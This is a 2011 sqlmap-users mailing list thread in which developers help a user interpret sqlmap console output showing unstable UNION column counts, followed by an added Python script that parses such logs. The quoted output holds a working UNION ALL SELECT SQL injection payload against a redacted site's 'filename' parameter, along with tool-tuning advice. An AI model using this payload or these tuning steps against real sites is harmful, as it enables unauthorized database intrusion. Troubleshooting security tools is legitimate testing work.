Re: [sqlmap-users] MySQL Union technique gives out inconsistent results
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:17:35
ok. i see that you've tried those --time-sec and --technique=U :)

now to resume a bit. "Generic UNION injections" are tricky ones. best thing would be if you could send us the -t traffic.txt of --technique=U --flush-session run.

kr

On Tue, Jul 12, 2011 at 11:13 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi all.
>
> little tutorial for all of you. spot the problematic parts:
>
> A)
> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
>
> B)
> ....
> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
> ....
>
> C)
> do you want to exploit this SQL injection? [Y/n] Y
> [14:40:13] [INFO] testing MySQL
> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
>
> now. do you see the problem yourself?
>
> that warning message says it all. have you tried lowering the --time-sec value? have you tried running with --technique=BEUS?
>
> thing is that in INNER JOIN cases injecting TIME BASED payloads can do lots of "[CRITICAL]" messages. hence that nice warning message :)
>
> kr
>
> On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
>> Hi Joahnna,
>>
>> Try to provide --union-char and --union-cols after you have verified the UNION query SQL injection manually in your browser.
>> Rerun with --flush-session and -t traffic.log and inspect the log file afterwards to see if the SQL payload is indeed part of the HTTP response you expect.
>> If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5".
>>
>> Bernardo
>>
>> On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote:
>>> Hi,
>>> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me?
>>>
>>> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep
>>>
>>> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
>>> http://www.sqlmap.org
>>>
>>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>>>
>>> [*] starting at 14:39:37
>>>
>>> [14:39:37] [INFO] setting file for logging HTTP traffic
>>> [14:39:37] [INFO] testing connection to the target url
>>> [14:39:38] [INFO] searching for forms
>>> [#1] form:
>>> GET xxxxxxxxx
>>> do you want to test this form? [Y/n/q]
>>> > Y
>>> Edit GET data [default: xxxxxxxx
>>> do you want to fill blank fields with random values? [Y/n] Y
>>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
>>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
>>> [14:39:38] [INFO] testing if the url is stable, wait a few seconds
>>> [14:39:39] [INFO] url is stable
>>> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
>>> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
>>> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
>>> [14:39:39] [INFO] testing sql injection on GET parameter 'productid'
>>> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>>> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>>> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>>> [14:39:41] [INFO] testing 'Oracle AND time-based blind'
>>> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>>> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>>> [14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
>>> [14:39:44] [WARNING] GET parameter 'productid' is not injectable
>>> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic
>>> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
>>> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
>>> [14:39:44] [INFO] testing sql injection on GET parameter 'name'
>>> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>>> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>>> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>>> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>>> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>>> [14:39:46] [INFO] testing 'Oracle AND time-based blind'
>>> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>>> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>>> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:51] [WARNING] GET parameter 'name' is not injectable
>>> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
>>> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
>>> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
>>> [14:39:52] [INFO] testing sql injection on GET parameter 'filename'
>>> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>>> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>>> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>>> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>>> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>>> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
>>> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>>> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>>> [14:39:56] [INFO] testing 'Oracle AND time-based blind'
>>> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>>> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>>> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy
>>> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
>>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy
>>> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
>>> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N
>>> sqlmap identified the following injection points with a total of 414 HTTP(s) requests:
>>> ---
>>> Place: GET
>>> Parameter: filename
>>> Type: UNION query
>>> Title: Generic UNION query (NULL) - 1 to 10 columns
>>> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsDiekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&creationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isactive=on&comment=uPni
>>> ---
>>>
>>> do you want to exploit this SQL injection? [Y/n] Y
>>> [14:40:13] [INFO] testing MySQL
>>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>>> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
>>> [14:40:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
>>>
>>> [*] shutting down at 14:40:16
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: Unavailable
>
> --
> Miroslav Stampar (@stamparm)
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
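The thread's diagnosis is that the "UNION injectable with N columns" line was emitted while the target was still unreachable after a time-based payload, which is why the column count moves between runs. The script below is an added example written for this page, not code from sqlmap or from any of the posters: it parses console output in the "[HH:MM:SS] [LEVEL] message" shape shown above and flags (a) bursts of "unable to connect" failures and how soon after a time-based test they started, (b) UNION column-count decisions that sit next to a connection failure, and (c) whether several runs agree on the column count. The two log excerpts (RUN_A, RUN_B) are constructed to resemble the thread's output; the function names and the 3-failure burst threshold are this example's own choices.

```python
"""Triage of sqlmap console output: spot UNION column-count decisions made while
the target was unreachable. Added example for this thread, not sqlmap code."""
import re
from collections import Counter

# Shape of the console lines quoted in the thread: "[HH:MM:SS] [LEVEL] message"
LOG_RE = re.compile(r"^\[(\d{2}):(\d{2}):(\d{2})\] \[(\w+)\] (.*)$")
UNION_COLS_RE = re.compile(r"UNION injectable with (\d+) columns")
NO_CONNECT = "unable to connect to the target url or proxy"
TIME_BASED = "time-based blind"


def parse(text):
    """Return [(seconds_since_midnight, level, message)] for matching lines;
    prompts, banners and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            h, mi, s, level, msg = m.groups()
            entries.append((int(h) * 3600 + int(mi) * 60 + int(s), level, msg))
    return entries


def connection_failure_bursts(entries, min_len=3):
    """Runs of >= min_len consecutive connection failures, each reported with
    the seconds elapsed since the last time-based test started (None if no
    time-based test preceded the run)."""
    bursts = []
    last_time_based = None
    i = 0
    while i < len(entries):
        ts, _, msg = entries[i]
        if msg.startswith("testing '") and TIME_BASED in msg:
            last_time_based = ts
        if NO_CONNECT in msg:
            j = i
            while j < len(entries) and NO_CONNECT in entries[j][2]:
                j += 1
            if j - i >= min_len:
                gap = None if last_time_based is None else ts - last_time_based
                bursts.append({"start": ts, "count": j - i, "secs_after_time_based": gap})
            i = j
        else:
            i += 1
    return bursts


def union_column_decisions(entries):
    """Each 'UNION injectable with N columns' decision, flagged when a
    connection failure sits immediately before or after it."""
    out = []
    for k, (_, _, msg) in enumerate(entries):
        m = UNION_COLS_RE.search(msg)
        if not m:
            continue
        neighbours = [entries[n][2] for n in (k - 1, k + 1) if 0 <= n < len(entries)]
        out.append({"columns": int(m.group(1)),
                    "during_outage": any(NO_CONNECT in n for n in neighbours)})
    return out


def column_count_consistency(runs):
    """Across several runs (list of log texts): the column counts reported and
    whether they agree. A count that moves between runs is not a usable finding."""
    counts = Counter()
    for text in runs:
        for d in union_column_decisions(parse(text)):
            counts[d["columns"]] += 1
    return {"counts": dict(counts), "consistent": len(counts) == 1}


# Constructed sample output modelled on the thread (not a real capture).
RUN_A = """
[14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
[14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
"""
RUN_B = """
[15:02:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:02:11] [INFO] target url appears to be UNION injectable with 7 columns
[15:02:12] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
"""

if __name__ == "__main__":
    for b in connection_failure_bursts(parse(RUN_A)):
        print("burst of %d failures starting %s s after the last time-based test"
              % (b["count"], b["secs_after_time_based"]))
    for d in union_column_decisions(parse(RUN_A)):
        print("UNION column count %d decided during outage: %s" % (d["columns"], d["during_outage"]))
    print(column_count_consistency([RUN_A, RUN_B]))
```

Run it over the console output of two -t/--flush-session runs: a burst that starts a few seconds after a time-based test, and a column-count line flagged as decided during the outage, is exactly the pattern Miroslav points at in A), B) and C), and a "consistent": False result across runs is the symptom Joahnna reported. Such a finding should be reverified by hand before it is reported.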